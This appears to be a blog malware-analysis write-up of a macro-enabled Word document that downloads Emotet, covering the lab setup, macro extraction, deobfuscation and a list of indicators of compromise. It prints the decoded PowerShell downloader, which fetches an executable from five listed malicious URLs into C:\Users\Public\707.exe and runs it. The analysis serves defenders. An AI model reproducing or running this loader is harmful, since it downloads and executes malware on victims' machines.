This write-up is for a macro embedded doc used as a downloader for Emotet.
Author: 5k33tz
MD5: 43d2a3df73fdcb10b9429a480d96ddcf
This sample first came to my attention by way of an alert for a download from an Emotet related URL. Looking at the PCAP I see a GET request to imdavidlee.com/9493MG/biz/US
After grabbing the file from the source and hashing it, I realized there were already 21/44 detections on VT. So I wanted to do some manual analysis to strengthen my skills and see how this sample works.
Running file against the sample:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Arorupyzheh-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sat Aug 25 00:31:00 2018, Last Saved Time/Date: Sat Aug 25 00:31:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 21, Security: 0
Running file against the sample:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Arorupyzheh-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sat Aug 25 00:31:00 2018, Last Saved Time/Date: Sat Aug 25 00:31:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 21, Security: 0
We can see it's a Word Doc, but probably the most interesting thing is the Author information Arorupyzheh-PC.
Running the doc through oledump.py, we can see that there are some macros embedded:
Next we can select one of the macros, decompress and dump it out, here is a truncated screenshot of the macro in item 9:
Since both macros are so heavily obfuscated, I decided to try some dynamic/behavioral analysis to see if we can get the deobfuscation routine to do the work for us and see the end-result.
In my WindowsREM VM I have Process Hacker running to monitor the process tree, and Process Monitor to view any command execution and file-system changes that may occur.
Also in my lab I have a REMnux VM that's setup as my default gateway, so I can monitor any "internet bound" traffic that's generated from my victim VM. On this VM I started up fakedns to resolve any DNS requests, INetSim to handle any file downloads, and Wireshark to get the in-depth packet data if needed.
With the tools running, I open the doc, and see it prompts the user to enable macros:
After clicking "Enable Content" and letting the macros do their thing, we can see in Process Hacker that WINWORD.EXE, launches cmd.exe, which then launches powershell.exe:
We could jump to the Linux VM and hopefully see any DNS resolution attempts of file download attempts, but first I'm interested to see the command-line invocations of cmd and PowerShell.
Saving the Process Monitor output to a CSV and importing it into ProcDOT, will give us a visualization of what the macros did on the system.
Viewing the command-line details for cmd.exe, we see the following:
Cleaning this up a bit and getting rid of the carets, we can see what looks like a base64 encoded command:
Interestingly enough base64 and powershell -e are in the reverse order, and the for loop at the end appears to un-reverse the command to launch in PowerShell. Reversing and decoding the base64 encoded string finally gives us some domains:
$BsQ=new-object Net.WebClient;$ipU='http://blog.bctianfu.cn/4@http://mail.vcacademy.lk/5nLo@http://lamemoria.in/2ib2Pt@http://tropicalislandrealtyofflorida.com/NNqM7W@http://businessarbitr.ru/E'.Split('@');$Gku = '707';$hBG=$env:public+'\'+$Gku+'.exe';foreach($CcE in $ipU){try{$BsQ.DownloadFile($CcE, $hBG);Invoke-Item $hBG;break;}catch{}}
The PowerShell script loops through an array of domains, attempts to download whatever is being hosted (presumably Emotet) and attempts to save the contents in C:\Users\Public\707.exe.
Unfortunately at the time of analysis, none of the binaries were hosted on the sites.
IOCs:
http://imdavidlee.com/9493MG/biz/US
43d2a3df73fdcb10b9429a480d96ddcf
Arorupyzheh-PC
http://blog.bctianfu.cn/4
http://mail.vcacademy.lk/5nLo
http://lamemoria.in/2ib2Pt
http://tropicalislandrealtyofflorida.com/NNqM7W
http://businessarbitr.ru/E
C:\Users\Public\707.exe
http://blog.bctianfu.cn/4
http://mail.vcacademy.lk/5nLo
http://lamemoria.in/2ib2Pt
http://tropicalislandrealtyofflorida.com/NNqM7W
http://businessarbitr.ru/E
C:\Users\Public\707.exe
Comments
Post a Comment